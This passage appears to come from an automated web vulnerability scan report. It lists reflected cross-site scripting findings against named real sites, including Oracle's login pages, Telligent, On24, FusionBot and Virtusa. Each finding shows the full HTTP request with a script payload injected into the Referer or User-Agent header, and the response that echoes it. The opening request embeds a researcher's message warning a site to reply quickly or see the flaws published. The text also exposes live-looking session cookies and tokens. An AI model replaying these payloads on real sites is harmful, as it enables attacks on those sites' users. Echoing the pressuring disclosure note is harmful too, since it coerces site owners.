GET /e.js?from=h02332%40gmail.com&body=Hoyt+LLC+Research+investigates+and+reports+on+security+vulnerabilities+embedded+in+Web+Applications+and+Products+used+in+wide-scale+deployment.+%0D%0A%0D%0ADisclosure+Info+%40+URI+http%3A%2F%2Fwww.cloudscan.me%2Fp%2Fhoyt-llc-research-vulnerability.html%0D%0A%0D%0AHello+-+David+Hoyt+here+with+Hoyt+LLC+Research+in+Boston%2C+MA+with+a+Private+Vuln+Report.+You%27ve+got+XSS%2C+everywhere...+everywhere..+%0D%0A%0D%0AE-mail+me+back+at+h02332%40gmail.com+quickly+if+you+don%27t+wants+this+published+at+URI+http%3A%2F%2Fxss.cx%2Fi%2Fduck.co-xss-1.jpg+and+http%3A%2F%2Fxss.cx%2Fi%2Fduckduckgo.com-xss-1.jpg%0D%0A%0D%0ABest%3B%0D%0A%0D%0ADavid%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A&copy=on&go= HTTP/1.1
Host: duckduckgo.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=79faa"><script>alert(1)</script>b50ac4e0b24b5c6ac
Cache-Control: max-age=0
Origin: http://duckduckgo.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:18:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Sun, 12 Nov 1999 20:28:05 GMT
Content-Length: 1462

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="robots" content="no
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=79faa"><script>alert(1)</script>b50ac4e0b24b5c6ac">
...[SNIP]...

3.227. https://event.on24.com/eventRegistration/EventLobbyServlet [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://event.on24.com
Path:   /eventRegistration/EventLobbyServlet

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542&partnerref=ocom&sourcepage=register HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ae7--><script>alert(1)</script>b0977adf47b
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:21 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=0rvu9xpQXsuNNX5uqSg34XHsQnJPAPazjTKeFaBUv5dhOISD2nsl!865718048; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close


<!-- optional parameters
cb            : leave blank to hide logo, or pass in appropriate cb value
topmargin        - default is 20
leftmargin        
...[SNIP]...
t 100%. useful to restrict content of two column reg page
middlecolumn: # of pixels for middle column. default is 4.
fyi: your user-agent string is: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ae7--><script>alert(1)</script>b0977adf47b
-->
...[SNIP]...

3.228. https://login.oracle.com/mysso/signon.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/signon.jsp

Request

GET /mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fmyprofile.oracle.com&ssousername=&subscribername= HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=f3f59"><script>alert(1)</script>a68788fd6cd
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; ORASSO_AUTH_HINT=v1.0~20110227072629; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:27:53 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 29 cfhOct 1969 17:04:19 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:27:53 GMT; path=/
Content-Length: 8443

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!--Template file taken from conftest -->
<!DOCTYPE HTML PUB
...[SNIP]...
<a href="https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://www.google.com/search?hl=en&q=f3f59"><script>alert(1)</script>a68788fd6cd" class="boldbodylink">
...[SNIP]...

3.229. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=c91e7"><script>alert(1)</script>8e874b658df
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:27:52 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 29 cfhOct 1969 17:04:19 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerloginadc_oracle_com_http=1997378189.25630.0000; expires=Sun, 27-Feb-2011 07:27:52 GMT; path=/
Content-Length: 8443

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!--Template file taken from conftest -->
<!DOCTYPE HTML PUB
...[SNIP]...
<a href="https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://www.google.com/search?hl=en&q=c91e7"><script>alert(1)</script>8e874b658df" class="boldbodylink">
...[SNIP]...

3.230. http://telligent.com/products/request_a_demo.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /products/request_a_demo.aspx

Request

GET /products/request_a_demo.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=20662"><script>alert(1)</script>4f1a3620730

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a57+GMT; expires=Sun, 26-Feb-2012 23:21:57 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:57 GMT
Connection: close
Content-Length: 66403


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=20662"><script>alert(1)</script>4f1a3620730">
...[SNIP]...

3.231. http://telligent.com/resources/m/analysts/1343205.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /resources/m/analysts/1343205.aspx

Request

GET /resources/m/analysts/1343205.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=137cc"><script>alert(1)</script>610a59d58cb

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a27+GMT; expires=Sun, 26-Feb-2012 23:22:27 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:27 GMT
Connection: close
Content-Length: 64261


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=137cc"><script>alert(1)</script>610a59d58cb">
...[SNIP]...

3.232. http://telligent.com/resources/m/analysts/1345217.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /resources/m/analysts/1345217.aspx

Request

GET /resources/m/analysts/1345217.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=bbc8d"><script>alert(1)</script>3a0b6097669

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a36+GMT; expires=Sun, 26-Feb-2012 23:22:36 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:36 GMT
Connection: close
Content-Length: 64972


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=bbc8d"><script>alert(1)</script>3a0b6097669">
...[SNIP]...

3.233. http://telligent.com/resources/m/success_stories/1331597.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /resources/m/success_stories/1331597.aspx

Request

GET /resources/m/success_stories/1331597.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=ad044"><script>alert(1)</script>2b4dec818f3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a43+GMT; expires=Sun, 26-Feb-2012 23:22:43 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:43 GMT
Connection: close
Content-Length: 64200


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=ad044"><script>alert(1)</script>2b4dec818f3">
...[SNIP]...

3.234. http://telligent.com/support/request_an_upgrade/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /support/request_an_upgrade/

Request

GET /support/request_an_upgrade/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=3cdbf"><script>alert(1)</script>e4ccb6eed44

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a23%3a35+GMT; expires=Sun, 26-Feb-2012 23:23:35 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:23:35 GMT
Connection: close
Content-Length: 61451


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=3cdbf"><script>alert(1)</script>e4ccb6eed44">
...[SNIP]...

3.235. http://www.fusionbot.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fusionbot.com
Path:   /

Request

GET / HTTP/1.1
Host: www.fusionbot.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=3c4ae><script>alert(1)</script>82d7eac8efb

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 01 Mar 2011 02:04:44 GMT
Pragma: no-cache
Last-Modified: Sun, 27 Feb 2011 15:16:45 GMT
Content-Length: 37753
Content-Type: text/html
Expires: Tue, 01 Mar 2011 02:03:45 GMT
Set-Cookie: fusionbot=www%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D3c4ae%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E82d7eac8efb; expires=Tue, 28-Feb-2012 06:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCARBRRAC=KOIHDGPCAFDOKBNMLLBGGFFL; path=/
Cache-control: no-cache


<html>
<head>
<base href="http://www.fusionbot.com/">
<title>Free Site Search Engine by FusionBot.com - Website Search &amp; Sitemap</title>
<meta name="description" content="Add a free site sea
...[SNIP]...
<img src=http://referrals.fusionbot.com/spec.gif?www.google.com/search?hl=en&q=3c4ae><script>alert(1)</script>82d7eac8efb&ip=173.193.214.243 width=1 height=1>
...[SNIP]...

3.236. http://www.virtusa.com/contactus [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /contactus

Request

GET /contactus HTTP/1.1
Host: www.virtusa.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=51bca"><script>alert(1)</script>a3159ea710e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utmb=213023891

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:35:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:35:38 GMT
Content-Length: 34628


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="ref" value="http://www.google.com/search?hl=en&q=51bca"><script>alert(1)</script>a3159ea710e" />
...[SNIP]...

